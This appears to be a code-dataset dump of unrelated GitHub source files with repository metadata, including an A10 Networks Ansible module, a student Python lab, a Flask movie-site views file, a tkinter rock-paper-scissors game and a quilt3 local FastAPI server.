'int',\n },\n 'aflex_switching_enqueue': {\n 'type': 'int',\n },\n 'url_switching_enqueue': {\n 'type': 'int',\n },\n 'host_switching_enqueue': {\n 'type': 'int',\n },\n 'lb_switching_enqueue': {\n 'type': 'int',\n },\n 'retry_503': {\n 'type': 'int',\n },\n 'aflex_retry': {\n 'type': 'int',\n },\n 'aflex_lb_reselect': {\n 'type': 'int',\n },\n 'aflex_lb_reselect_ok': {\n 'type': 'int',\n },\n 'client_rst_request': {\n 'type': 'int',\n },\n 'client_rst_connecting': {\n 'type': 'int',\n },\n 'client_rst_connected': {\n 'type': 'int',\n },\n 'client_rst_response': {\n 'type': 'int',\n },\n 'server_rst_request': {\n 'type': 'int',\n },\n 'server_rst_connecting': {\n 'type': 'int',\n },\n 'server_rst_connected': {\n 'type': 'int',\n },\n 'server_rst_response': {\n 'type': 'int',\n },\n 'invalid_header': {\n 'type': 'int',\n },\n 'too_many_headers': {\n 'type': 'int',\n },\n 'line_too_long': {\n 'type': 'int',\n },\n 'header_name_too_long': {\n 'type': 'int',\n },\n 'wrong_resp_header': {\n 'type': 'int',\n },\n 'header_insert': {\n 'type': 'int',\n },\n 'header_delete': {\n 'type': 'int',\n },\n 'insert_client_ip': {\n 'type': 'int',\n },\n 'negative_req_remain': {\n 'type': 'int',\n },\n 'negative_resp_remain': {\n 'type': 'int',\n },\n 'large_cookie': {\n 'type': 'int',\n },\n 'large_cookie_header': {\n 'type': 'int',\n },\n 'huge_cookie': {\n 'type': 'int',\n },\n 'huge_cookie_header': {\n 'type': 'int',\n },\n 'parse_cookie_fail': {\n 'type': 'int',\n },\n 'parse_setcookie_fail': {\n 'type': 'int',\n },\n 'asm_cookie_fail': {\n 'type': 'int',\n },\n 'asm_cookie_header_fail': {\n 'type': 'int',\n },\n 'asm_setcookie_fail': {\n 'type': 'int',\n },\n 'asm_setcookie_header_fail': {\n 'type': 'int',\n },\n 'client_req_unexp_flag': {\n 'type': 'int',\n },\n 'connecting_fin': {\n 'type': 'int',\n },\n 'connecting_fin_retrans': {\n 'type': 'int',\n },\n 'connecting_fin_ofo': {\n 'type': 'int',\n },\n 'connecting_rst': {\n 'type': 'int',\n },\n 'connecting_rst_retrans': {\n 'type': 'int',\n },\n 'connecting_rst_ofo': {\n 'type': 'int',\n },\n 'connecting_ack': {\n 'type': 'int',\n },\n 'pkts_ofo': {\n 'type': 'int',\n },\n 'pkts_retrans': {\n 'type': 'int',\n },\n 'pkts_retrans_ack_finwait': {\n 'type': 'int',\n },\n 'pkts_retrans_fin': {\n 'type': 'int',\n },\n 'pkts_retrans_rst': {\n 'type': 'int',\n },\n 'pkts_retrans_push': {\n 'type': 'int',\n },\n 'stale_sess': {\n 'type': 'int',\n },\n 'server_resel_failed': {\n 'type': 'int',\n },\n 'response_1xx': {\n 'type': 'int',\n },\n 'response_100': {\n 'type': 'int',\n },\n 'response_101': {\n 'type': 'int',\n },\n 'response_102': {\n 'type': 'int',\n },\n 'response_2xx': {\n 'type': 'int',\n },\n 'response_200': {\n 'type': 'int',\n },\n 'response_201': {\n 'type': 'int',\n },\n 'response_202': {\n 'type': 'int',\n },\n 'response_203': {\n 'type': 'int',\n },\n 'response_204': {\n 'type': 'int',\n },\n 'response_205': {\n 'type': 'int',\n },\n 'response_206': {\n 'type': 'int',\n },\n 'response_207': {\n 'type': 'int',\n },\n 'response_3xx': {\n 'type': 'int',\n },\n 'response_300': {\n 'type': 'int',\n },\n 'response_301': {\n 'type': 'int',\n },\n 'response_302': {\n 'type': 'int',\n },\n 'response_303': {\n 'type': 'int',\n },\n 'response_304': {\n 'type': 'int',\n },\n 'response_305': {\n 'type': 'int',\n },\n 'response_306': {\n 'type': 'int',\n },\n 'response_307': {\n 'type': 'int',\n },\n 'response_4xx': {\n 'type': 'int',\n },\n 'response_400': {\n 'type': 'int',\n },\n 'response_401': {\n 'type': 'int',\n },\n 'response_402': {\n 'type': 'int',\n },\n 'response_403': {\n 'type': 'int',\n },\n 'response_404': {\n 'type': 'int',\n },\n 'response_405': {\n 'type': 'int',\n },\n 'response_406': {\n 'type': 'int',\n },\n 'response_407': {\n 'type': 'int',\n },\n 'response_408': {\n 'type': 'int',\n },\n 'response_409': {\n 'type': 'int',\n },\n 'response_410': {\n 'type': 'int',\n },\n 'response_411': {\n 'type': 'int',\n },\n 'response_412': {\n 'type': 'int',\n },\n 'response_413': {\n 'type': 'int',\n },\n 'response_414': {\n 'type': 'int',\n },\n 'response_415': {\n 'type': 'int',\n },\n 'response_416': {\n 'type': 'int',\n },\n 'response_417': {\n 'type': 'int',\n },\n 'response_418': {\n 'type': 'int',\n },\n 'response_422': {\n 'type': 'int',\n },\n 'response_423': {\n 'type': 'int',\n },\n 'response_424': {\n 'type': 'int',\n },\n 'response_425': {\n 'type': 'int',\n },\n 'response_426': {\n 'type': 'int',\n },\n 'response_449': {\n 'type': 'int',\n },\n 'response_450': {\n 'type': 'int',\n },\n 'response_5xx': {\n 'type': 'int',\n },\n 'response_500': {\n 'type': 'int',\n },\n 'response_501': {\n 'type': 'int',\n },\n 'response_502': {\n 'type': 'int',\n },\n 'response_503': {\n 'type': 'int',\n },\n 'response_504': {\n 'type': 'int',\n },\n 'response_505': {\n 'type': 'int',\n },\n 'response_506': {\n 'type': 'int',\n },\n 'response_507': {\n 'type': 'int',\n },\n 'response_508': {\n 'type': 'int',\n },\n 'response_509': {\n 'type': 'int',\n },\n 'response_510': {\n 'type': 'int',\n },\n 'response_6xx': {\n 'type': 'int',\n },\n 'response_unknown': {\n 'type': 'int',\n },\n 'req_http10': {\n 'type': 'int',\n },\n 'req_http11': {\n 'type': 'int',\n },\n 'response_http10': {\n 'type': 'int',\n },\n 'response_http11': {\n 'type': 'int',\n },\n 'req_get': {\n 'type': 'int',\n },\n 'req_head': {\n 'type': 'int',\n },\n 'req_put': {\n 'type': 'int',\n },\n 'req_post': {\n 'type': 'int',\n },\n 'req_trace': {\n 'type': 'int',\n },\n 'req_options': {\n 'type': 'int',\n },\n 'req_connect': {\n 'type': 'int',\n },\n 'req_delete': {\n 'type': 'int',\n },\n 'req_unknown': {\n 'type': 'int',\n },\n 'req_content_len': {\n 'type': 'int',\n },\n 'rsp_content_len': {\n 'type': 'int',\n },\n 'rsp_chunk': {\n 'type': 'int',\n },\n 'req_chunk': {\n 'type': 'int',\n },\n 'compress_rsp': {\n 'type': 'int',\n },\n 'compress_rsp_br': {\n 'type': 'int',\n },\n 'compress_rsp_total': {\n 'type': 'int',\n },\n 'compress_del_accept_enc': {\n 'type': 'int',\n },\n 'compress_resp_already_compressed': {\n 'type': 'int',\n },\n 'compress_content_type_excluded': {\n 'type': 'int',\n },\n 'compress_no_content_type': {\n 'type': 'int',\n },\n 'compress_resp_lt_min': {\n 'type': 'int',\n },\n 'compress_resp_no_cl_or_ce': {\n 'type': 'int',\n },\n 'compress_ratio_too_high': {\n 'type': 'int',\n },\n 'cache_rsp': {\n 'type': 'int',\n },\n 'close_on_ddos': {\n 'type': 'int',\n },\n 'req_http10_keepalive': {\n 'type': 'int',\n },\n 'req_sz_1k': {\n 'type': 'int',\n },\n 'req_sz_2k': {\n 'type': 'int',\n },\n 'req_sz_4k': {\n 'type': 'int',\n },\n 'req_sz_8k': {\n 'type': 'int',\n },\n 'req_sz_16k': {\n 'type': 'int',\n },\n 'req_sz_32k': {\n 'type': 'int',\n },\n 'req_sz_64k': {\n 'type': 'int',\n },\n 'req_sz_256k': {\n 'type': 'int',\n },\n 'req_sz_gt_256k': {\n 'type': 'int',\n },\n 'rsp_sz_1k': {\n 'type': 'int',\n },\n 'rsp_sz_2k': {\n 'type': 'int',\n },\n 'rsp_sz_4k': {\n 'type': 'int',\n },\n 'rsp_sz_8k': {\n 'type': 'int',\n },\n 'rsp_sz_16k': {\n 'type': 'int',\n },\n 'rsp_sz_32k': {\n 'type': 'int',\n },\n 'rsp_sz_64k': {\n 'type': 'int',\n },\n 'rsp_sz_256k': {\n 'type': 'int',\n },\n 'rsp_sz_gt_256k': {\n 'type': 'int',\n },\n 'chunk_sz_512': {\n 'type': 'int',\n },\n 'chunk_sz_1k': {\n 'type': 'int',\n },\n 'chunk_sz_2k': {\n 'type': 'int',\n },\n 'chunk_sz_4k': {\n 'type': 'int',\n },\n 'chunk_sz_gt_4k': {\n 'type': 'int',\n },\n 'pconn_connecting': {\n 'type': 'int',\n },\n 'pconn_connected': {\n 'type': 'int',\n },\n 'pconn_connecting_failed': {\n 'type': 'int',\n },\n 'chunk_bad': {\n 'type': 'int',\n },\n 'req_10u': {\n 'type': 'int',\n },\n 'req_20u': {\n 'type': 'int',\n },\n 'req_50u': {\n 'type': 'int',\n },\n 'req_100u': {\n 'type': 'int',\n },\n 'req_200u': {\n 'type': 'int',\n },\n 'req_500u': {\n 'type': 'int',\n },\n 'req_1m': {\n 'type': 'int',\n },\n 'req_2m': {\n 'type': 'int',\n },\n 'req_5m': {\n 'type': 'int',\n },\n 'req_10m': {\n 'type': 'int',\n },\n 'req_20m': {\n 'type': 'int',\n },\n 'req_50m': {\n 'type': 'int',\n },\n 'req_100m': {\n 'type': 'int',\n },\n 'req_200m': {\n 'type': 'int',\n },\n 'req_500m': {\n 'type': 'int',\n },\n 'req_1s': {\n 'type': 'int',\n },\n 'req_2s': {\n 'type': 'int',\n },\n 'req_5s': {\n 'type': 'int',\n },\n 'req_over_5s': {\n 'type': 'int',\n },\n 'insert_client_port': {\n 'type': 'int',\n },\n 'req_track': {\n 'type': 'int',\n },\n 'non_http_bypass': {\n 'type': 'int',\n },\n 'skip_insert_client_ip': {\n 'type': 'int',\n },\n 'skip_insert_client_port': {\n 'type': 'int',\n },\n 'http_pkts_ofo': {\n 'type': 'int',\n }\n },\n 'cpu_count': {\n 'type': 'int',\n },\n 'debug_fields': {\n 'type': 'bool',\n }\n },\n 'stats': {\n 'type': 'dict',\n 'curr_proxy': {\n 'type': 'str',\n },\n 'total_proxy': {\n 'type': 'str',\n },\n 'req': {\n 'type': 'str',\n },\n 'req_succ': {\n 'type': 'str',\n },\n 'noproxy': {\n 'type': 'str',\n },\n 'client_rst': {\n 'type': 'str',\n },\n 'server_rst': {\n 'type': 'str',\n },\n 'notuple': {\n 'type': 'str',\n },\n 'parsereq_fail': {\n 'type': 'str',\n },\n 'svrsel_fail': {\n 'type': 'str',\n },\n 'fwdreq_fail': {\n 'type': 'str',\n },\n 'fwdreqdata_fail': {\n 'type': 'str',\n },\n 'req_retran': {\n 'type': 'str',\n },\n 'req_ofo': {\n 'type': 'str',\n },\n 'server_resel': {\n 'type': 'str',\n },\n 'svr_prem_close': {\n 'type': 'str',\n },\n 'new_svrconn': {\n 'type': 'str',\n },\n 'snat_fail': {\n 'type': 'str',\n },\n 'tcpoutrst': {\n 'type': 'str',\n },\n 'full_proxy': {\n 'type': 'str',\n },\n 'full_proxy_post': {\n 'type': 'str',\n },\n 'full_proxy_pipeline': {\n 'type': 'str',\n },\n 'full_proxy_fpga_err': {\n 'type': 'str',\n },\n 'req_over_limit': {\n 'type': 'str',\n },\n 'req_rate_over_limit': {\n 'type': 'str',\n },\n 'close_on_ddos': {\n 'type': 'str',\n },\n 'full_proxy_put': {\n 'type': 'str',\n }\n }\n })\n return rv\n\n\ndef existing_url(module):\n \"\"\"Return the URL for an existing resource\"\"\"\n # Build the format dictionary\n url_base = \"/axapi/v3/slb/fast-http-proxy\"\n\n f_dict = {}\n\n return url_base.format(**f_dict)\n\n\ndef new_url(module):\n \"\"\"Return the URL for creating a resource\"\"\"\n # To create the URL, we need to take the format string and return it with no params\n url_base = \"/axapi/v3/slb/fast-http-proxy\"\n\n f_dict = {}\n\n return url_base.format(**f_dict)\n\n\ndef report_changes(module, result, existing_config, payload):\n change_results = copy.deepcopy(result)\n if not existing_config:\n change_results[\"modified_values\"].update(**payload)\n return change_results\n\n config_changes = copy.deepcopy(existing_config)\n for k, v in payload[\"fast-http-proxy\"].items():\n v = 1 if str(v).lower() == \"true\" else v\n v = 0 if str(v).lower() == \"false\" else v\n\n if config_changes[\"fast-http-proxy\"].get(k) != v:\n change_results[\"changed\"] = True\n config_changes[\"fast-http-proxy\"][k] = v\n\n change_results[\"modified_values\"].update(**config_changes)\n return change_results\n\n\ndef create(module, result, payload={}):\n call_result = api_client.post(module.client, new_url(module), payload)\n result[\"axapi_calls\"].append(call_result)\n result[\"modified_values\"].update(**call_result[\"response_body\"])\n result[\"changed\"] = True\n return result\n\n\ndef update(module, result, existing_config, payload={}):\n call_result = api_client.post(module.client, existing_url(module), payload)\n result[\"axapi_calls\"].append(call_result)\n if call_result[\"response_body\"] == existing_config:\n result[\"changed\"] = False\n else:\n result[\"modified_values\"].update(**call_result[\"response_body\"])\n result[\"changed\"] = True\n return result\n\n\ndef present(module, result, existing_config):\n payload = utils.build_json(\"fast-http-proxy\", module.params, AVAILABLE_PROPERTIES)\n change_results = report_changes(module, result, existing_config, payload)\n if module.check_mode:\n return change_results\n elif not existing_config:\n return create(module, result, payload)\n elif existing_config and change_results.get('changed'):\n return update(module, result, existing_config, payload)\n return result\n\n\ndef delete(module, result):\n try:\n call_result = api_client.delete(module.client, existing_url(module))\n result[\"axapi_calls\"].append(call_result)\n result[\"changed\"] = True\n except a10_ex.NotFound:\n result[\"changed\"] = False\n return result\n\n\ndef absent(module, result, existing_config):\n if not existing_config:\n result[\"changed\"] = False\n return result\n\n if module.check_mode:\n result[\"changed\"] = True\n return result\n\n return delete(module, result)\n\n\ndef run_command(module):\n result = dict(changed=False, messages=\"\", modified_values={}, axapi_calls=[], ansible_facts={}, acos_info={})\n\n state = module.params[\"state\"]\n ansible_host = module.params[\"ansible_host\"]\n ansible_username = module.params[\"ansible_username\"]\n ansible_password = module.params[\"ansible_password\"]\n ansible_port = module.params[\"ansible_port\"]\n a10_partition = module.params[\"a10_partition\"]\n a10_device_context_id = module.params[\"a10_device_context_id\"]\n\n if ansible_port == 80:\n protocol = \"http\"\n elif ansible_port == 443:\n protocol = \"https\"\n\n module.client = client_factory(ansible_host, ansible_port, protocol, ansible_username, ansible_password)\n\n valid = True\n\n run_errors = []\n if state == 'present':\n requires_one_of = sorted([])\n valid, validation_errors = utils.validate(module.params, requires_one_of)\n for ve in validation_errors:\n run_errors.append(ve)\n\n if not valid:\n err_msg = \"\\n\".join(run_errors)\n result[\"messages\"] = \"Validation failure: \" + str(run_errors)\n module.fail_json(msg=err_msg, **result)\n\n try:\n if a10_partition:\n result[\"axapi_calls\"].append(api_client.active_partition(module.client, a10_partition))\n\n if a10_device_context_id:\n result[\"axapi_calls\"].append(api_client.switch_device_context(module.client, a10_device_context_id))\n\n existing_config = api_client.get(module.client, existing_url(module))\n result[\"axapi_calls\"].append(existing_config)\n if existing_config['response_body'] != 'NotFound':\n existing_config = existing_config[\"response_body\"]\n else:\n existing_config = None\n\n if state == 'present':\n result = present(module, result, existing_config)\n\n if state == 'absent':\n result = absent(module, result, existing_config)\n\n if state == 'noop':\n if module.params.get(\"get_type\") == \"single\":\n get_result = api_client.get(module.client, existing_url(module))\n result[\"axapi_calls\"].append(get_result)\n info = get_result[\"response_body\"]\n result[\"acos_info\"] = info[\"fast-http-proxy\"] if info != \"NotFound\" else info\n elif module.params.get(\"get_type\") == \"list\":\n get_list_result = api_client.get_list(module.client, existing_url(module))\n result[\"axapi_calls\"].append(get_list_result)\n\n info = get_list_result[\"response_body\"]\n result[\"acos_info\"] = info[\"fast-http-proxy-list\"] if info != \"NotFound\" else info\n elif module.params.get(\"get_type\") == \"oper\":\n get_oper_result = api_client.get_oper(module.client, existing_url(module), params=module.params)\n result[\"axapi_calls\"].append(get_oper_result)\n info = get_oper_result[\"response_body\"]\n result[\"acos_info\"] = info[\"fast-http-proxy\"][\"oper\"] if info != \"NotFound\" else info\n elif module.params.get(\"get_type\") == \"stats\":\n get_type_result = api_client.get_stats(module.client, existing_url(module), params=module.params)\n result[\"axapi_calls\"].append(get_type_result)\n info = get_type_result[\"response_body\"]\n result[\"acos_info\"] = info[\"fast-http-proxy\"][\"stats\"] if info != \"NotFound\" else info\n except a10_ex.ACOSException as ex:\n module.fail_json(msg=ex.msg, **result)\n except Exception as gex:\n raise gex\n finally:\n if module.client.auth_session.session_id:\n module.client.auth_session.close()\n\n return result\n\n\ndef main():\n module = AnsibleModule(argument_spec=get_argspec(), supports_check_mode=True)\n result = run_command(module)\n module.exit_json(**result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"a10networks/a10-acos-axapi","sub_path":"plugins/modules/a10_slb_fast_http_proxy.py","file_name":"a10_slb_fast_http_proxy.py","file_ext":"py","file_size_in_byte":56023,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"53"} +{"seq_id":"37223607955","text":"\"\"\"Lab 2: Expressions and Control Structures\"\"\"\n\n#Fill in your name and surname\nname = \"Andile & Lavender Zandile\"\nsurname = \"Mbele & Tshuma\"\nassignment = \"lab2\"\n\ndef both_positive(x, y):\n \"\"\"Returns True if both x and y are positive.\n\n >>> both_positive(-1, 1)\n False\n >>> both_positive(1, 1)\n True\n \"\"\"\n if x > 0 and y > 0:\n\t return True\n else:\n\t return False\n\ndef sum_digits(n):\n \"\"\"Sum all the digits of n.\n\n >>> sum_digits(10) # 1 + 0 = 1\n 1\n >>> sum_digits(4224) # 4 + 2 + 2 + 4 = 12\n 12\n >>> sum_digits(1234567890)\n 45\n >>> x = sum_digits(123) # make sure that you are using return rather than print\n >>> x\n 6\n \"\"\"\n\n \"\"\"Sum_digits using iteration\"\"\"\n total = 0\n while n > 10:\n remainder = n % 10\n total += remainder\n n = n // 10\n return total + n\n\n \"*** DONE ***\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"xeroxzen/Bootcamp-Labs","sub_path":"lab2/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5851622837","text":"from core import app\nfrom flask import render_template, request,redirect,url_for\nfrom core.functions import *\n\n#--------------------#\n# R U T A S Y VISTAS\n#--------------------#\n\n#--------------------#\n# P U B L I C A S\n#--------------------#\n\n#Ruta principal \n\n@app.route(\"/\")\ndef principal():\n return render_template(\"public/index.html\",)\n\n#Ruta del login\n\n@app.route(\"/login\")\ndef login():\n return render_template(\"public/login.html\")\n@app.route(\"/user\", methods=['POST'])\n\n#--------------------#\n# P R I V A D A S\n#--------------------#\n\ndef user(): \n parametros = request.form\n #print(\"\\nLOS PARAMETROS SON: \", parametros,\"\\n\")\n username = parametros['username']\n password = parametros['pass']\n if searchUserInJson(username, password, 'database/cuentas.json'):\n return render_template('users/movie_info.html')\n else:\n return render_template('login_user.html')\n\n\n#Ruta para agregar peliculas\n\n@app.route(\"/user/addMovie\", methods=['GET'])\ndef addMovies():\n parametros = request.args\n print (parametros[\"id\"])\n \n url= addMovie(parametros[\"id\"]) \n if url == True:\n return redirect(url_for('login'))\n else:\n return \"

A ocurrido un error

\" \n\n\n#Ruta para editar peliculas\n\n@app.route(\"/user/edit_movie\", methods=['GET'])\ndef renderEditMovie():\n parametros = request.args\n print (parametros)\n Id = parametros[\"Id\"]\n infoMovie = getMovieInfoById(Id)\n return render_template(\"users/edit_movie.html\", infoMovie=infoMovie)\n\n\n#Ruta para actualizar la informacion de las peliculas\n\n@app.route(\"/user/update_movie\", methods=['POST','GET'])\ndef updateMovie():\n id=request.args[\"Id\"]\n params = request.form\n print(params['Title'])\n editMovie(id, params['Title'], params['Plot'], params['Director'], params['Genre'], params['Year'],params['Poster'])\n return redirect(url_for('login'))\n\n\n#Ruta para eliminar las peliculas\n\n@app.route(\"/user/delete_movie\", methods=['GET'])\ndef delMovie():\n id=request.args[\"Id\"]\n state = deleteMovie(id)\n if state:\n return redirect(url_for('login'))\n else:\n return \"

Usted no puede borrar peliculas con comentarios

\"","repo_name":"camiloCanclini/proyecto-programacionII-Canclini-Antunez","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16690684735","text":"#程序文件ex9_18.py\r\nimport pandas as pd\r\nimport numpy as np\r\nimport statsmodels.api as sm\r\n\r\na = pd.read_excel('data9_18.xlsx', header=None)\r\nb = a.values.T; y = b[~np.isnan(b)]\r\nx = np.hstack([np.ones(5), np.full(4,2), np.full(4,3), np.full(3,4)])\r\nd = {'x':x, 'y':y} #构造字典\r\nmodel = sm.formula.ols('y~C(x)', d).fit() #构建模型\r\nanovat = sm.stats.anova_lm(model) #进行单因素方差分析\r\nprint(anovat)\r\n\r\n","repo_name":"LuyuZhang00/CUMCM2022","sub_path":"python数学建模算法与应用/09第9章 数据的描述性统计方法/ex9_18.py","file_name":"ex9_18.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"74789843047","text":"from collections import deque\ndef solution(n, computers):\n answer = 0\n \n queue = deque()\n visited = [0 for _ in range(n)]\n \n count = 0\n \n while 0 in visited:\n idx = visited.index(0)\n queue.append(idx)\n visited[idx] = 1\n count += 1\n \n while queue:\n temp = queue.popleft()\n for i in range(n):\n if computers[temp][i] == 1 and visited[i] == 0:\n queue.append(i)\n visited[i] = 1\n \n answer = count\n return answer","repo_name":"deltaori0/Python-Algorithm","sub_path":"programmers/DFS_BFS/네트워크.py","file_name":"네트워크.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41879422297","text":"import random\nfrom tkinter import *\nfrom tkinter import Label\n\nfrom PIL import ImageTk, Image\n\ns = Tk()\nc, ur = 0, 0\n\ns.title('rock paper scissor')\ns.iconbitmap('images/rps.ico')\n\n\ndef playagain_fun2():\n my_.grid_remove()\n com_.grid_remove()\n play_again.grid_remove()\n buttons()\n\n\ndef winner(u, com):\n global printing, ur, c\n if u == com:\n\n printing = Label(s, text=\"it's a draw \")\n printing.grid(row=2, column=0, columnspan=3)\n # printing.pack()\n # print(\"draw\")\n elif u == (\"rock\" and com == \"paper\") or (u == \"paper\" and com == \"scissor\") or (u == \"scissor\" and com == \"rock\"):\n printing = Label(s, text=\"computer won over you \")\n printing.grid(row=2, column=0, columnspan=3)\n c += 1\n # printing.pack()\n # print(\"com won\")\n\n else:\n printing = Label(s, text=\"you won over computer \")\n printing.grid(row=2, column=0, columnspan=3)\n ur += 1\n\n\ndef computer_choice():\n a = [(\"rock\", rock_img), (\"paper\", paper_img), (\"scissor\", scissor_img)]\n com = random.choice(a)\n return com\n\n\ndef rock_fun():\n global my1, my, comp, vs, comp1\n com = computer_choice()\n my = Label(s, text=\"your choice\")\n my.grid(row=0, column=0)\n my1 = Label(s, image=rock_img)\n my1.grid(row=1, column=0)\n\n vs = Label(s, image=vs_img)\n vs.grid(row=1, column=1)\n\n comp = Label(s, text=\"computer's choice\")\n comp.grid(row=0, column=2)\n comp1 = Label(s, image=com[1])\n comp1.grid(row=1, column=2)\n\n winner(\"rock\", com[0])\n\n rock.grid_remove()\n paper.grid_remove()\n scissor.grid_remove()\n play()\n\n\ndef paper_fun():\n global my1, my, comp, vs, comp1\n\n com = computer_choice()\n my = Label(s, text=\"your choice\")\n my.grid(row=0, column=0)\n my1 = Label(s, image=paper_img)\n my1.grid(row=1, column=0)\n\n vs = Label(s, image=vs_img)\n vs.grid(row=1, column=1)\n\n comp = Label(s, text=\"computer's choice\")\n comp.grid(row=0, column=2)\n comp1 = Label(s, image=com[1])\n comp1.grid(row=1, column=2)\n\n winner(\"paper\", com[0])\n\n rock.grid_remove()\n paper.grid_remove()\n scissor.grid_remove()\n play()\n\n\ndef scissor_fun():\n global my1, my, comp, vs, comp1\n com = computer_choice()\n my = Label(s, text=\"your choice\")\n my.grid(row=0, column=0)\n my1 = Label(s, image=scissor_img)\n my1.grid(row=1, column=0)\n\n vs = Label(s, image=vs_img)\n vs.grid(row=1, column=1)\n\n comp = Label(s, text=\"computer's choice\")\n comp.grid(row=0, column=2)\n comp1 = Label(s, image=com[1])\n comp1.grid(row=1, column=2)\n\n winner(\"scissor\", com[0])\n\n rock.grid_remove()\n paper.grid_remove()\n scissor.grid_remove()\n play()\n\n\ndef playagain_fun():\n my.grid_remove()\n comp.grid_remove()\n my1.grid_remove()\n comp1.grid_remove()\n printing.grid_remove()\n buttons()\n playagain.grid_remove()\n score.grid_remove()\n vs.grid_remove()\n\n\ndef score_fun():\n global my_, com_, play_again\n score.grid_remove()\n my.grid_remove()\n my1.grid_remove()\n comp.grid_remove()\n comp1.grid_remove()\n vs.grid_remove()\n printing.grid_remove()\n playagain.grid_remove()\n text = \"yours score \\n\" + str(ur)\n\n my_ = Label(s, text=text)\n my_.grid(row=0, column=0)\n\n text = \"computer's score \\n\" + str(c)\n\n com_ = Label(s, text=text)\n com_.grid(row=0, column=2)\n\n play_again = Button(s, image=play_img, command=playagain_fun2, borderwidth=0)\n play_again.grid(row=3, column=0, columnspan=3)\n\n\ndef play():\n global playagain, score\n playagain = Button(s, image=play_img, command=playagain_fun, borderwidth=0)\n playagain.grid(row=3, column=0, columnspan=3)\n\n score = Button(s, image=score_img, command=score_fun, borderwidth=0)\n score.grid(row=4, column=0, columnspan=3)\n\n\ndef buttons():\n global rock, paper, scissor, playagain, score\n Label(s).grid(row=0, column=0)\n rock = Button(s, image=rock_img, command=rock_fun, padx=20, borderwidth=0)\n rock.grid(row=1, column=0, rowspan=2)\n\n paper = Button(s, image=paper_img, command=paper_fun, padx=20, borderwidth=0)\n paper.grid(row=1, column=1, rowspan=2)\n\n scissor = Button(s, image=scissor_img, command=scissor_fun, padx=20, borderwidth=0)\n scissor.grid(row=1, column=2, rowspan=2)\n\n\nrock_img = ImageTk.PhotoImage(Image.open(\"images/rock.png\"))\n\npaper_img = ImageTk.PhotoImage(Image.open(\"images/paper.png\"))\n\nscissor_img = ImageTk.PhotoImage(Image.open(\"images/scissor.png\"))\n\nplay_img = ImageTk.PhotoImage(Image.open(\"images/playagain.png\"))\n\nvs_img = ImageTk.PhotoImage(Image.open(\"images/vs.png\"))\n\nscore_img = ImageTk.PhotoImage(Image.open(\"images/score1.png\"))\n\nexits = Button(s, text=\"exit\", command=s.quit, bg=\"red\", fg=\"white\", borderwidth=0, padx=50, pady=5)\nexits.grid(row=5, column=0, columnspan=3)\n\nbuttons()\ns.mainloop()\n","repo_name":"garuda0py/rps","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14333655515","text":"import os\nimport typing as T\n\nimport fastapi\nimport starlette.staticfiles\n\nfrom .api import api\nfrom .lambdas import lambdas\nfrom .s3proxy import s3proxy\n\nREG_PREFIX = \"/__reg\"\nLAMBDA_PREFIX = \"/__lambda\"\nS3_PROXY_PREFIX = \"/__s3proxy\"\nCATALOG_BUNDLE = os.getenv(\"QUILT_CATALOG_BUNDLE\")\nCATALOG_URL = os.getenv(\"QUILT_CATALOG_URL\")\n\napp = fastapi.FastAPI()\n\n\nclass SPA(starlette.staticfiles.StaticFiles):\n def __init__(self, directory: T.Optional[os.PathLike] = None, index='index.html') -> None:\n self.index = index\n if not directory:\n directory = os.path.join(os.path.dirname(__file__), \"catalog_bundle\")\n super().__init__(directory=directory, packages=None, html=True, check_dir=True)\n\n async def lookup_path(self, path: str) -> T.Tuple[str, os.stat_result]:\n full_path, stat_result = await super().lookup_path(path)\n\n # return index if a file cannot be found\n if stat_result is None:\n return await super().lookup_path(self.index)\n\n return (full_path, stat_result)\n\n\n@app.get(\"/config.json\")\ndef config():\n return {\n \"alwaysRequiresAuth\": False,\n \"analyticsBucket\": \"\",\n \"apiGatewayEndpoint\": LAMBDA_PREFIX,\n \"binaryApiGatewayEndpoint\": LAMBDA_PREFIX,\n \"googleClientId\": \"\",\n \"mixpanelToken\": \"\",\n \"mode\": \"LOCAL\",\n \"noDownload\": True,\n \"oktaBaseUrl\": \"\",\n \"oktaClientId\": \"\",\n \"oneLoginBaseUrl\": \"\",\n \"oneLoginClientId\": \"\",\n \"passwordAuth\": \"DISABLED\",\n \"registryUrl\": REG_PREFIX,\n \"s3Proxy\": S3_PROXY_PREFIX,\n \"sentryDSN\": \"\",\n \"serviceBucket\": \"\",\n \"signInRedirect\": \"/\",\n \"signOutRedirect\": \"/\",\n \"ssoAuth\": \"DISABLED\",\n \"ssoProviders\": \"\",\n }\n\n\napp.mount(REG_PREFIX, api, \"API\")\napp.mount(LAMBDA_PREFIX, lambdas, \"Lambda\")\napp.mount(S3_PROXY_PREFIX, s3proxy, \"S3 Proxy\")\n\nif CATALOG_URL:\n # to avoid long-polling connections preventing server restarts\n @app.get(\"/__webpack_hmr\")\n def webpack_hmr():\n return starlette.responses.Response(status_code=404)\n\n from asgiproxy.__main__ import make_app as make_proxy_app\n\n proxy_app, proxy_context = make_proxy_app(upstream_base_url=CATALOG_URL)\n app.mount(\"/\", proxy_app, \"SPAProxy\")\n\n @app.on_event(\"shutdown\")\n async def on_shutdown():\n await proxy_context.close()\n\nelse:\n app.mount(\"/\", SPA(directory=CATALOG_BUNDLE), \"SPA\")\n\n\ndef run():\n try:\n import uvicorn\n except ImportError:\n print(\"Please install uvicorn to run a development server.\")\n import sys\n sys.exit(0)\n\n uvicorn.run(\n \"quilt3_local.main:app\",\n port=int(os.getenv(\"PORT\", \"3000\")),\n reload=True,\n 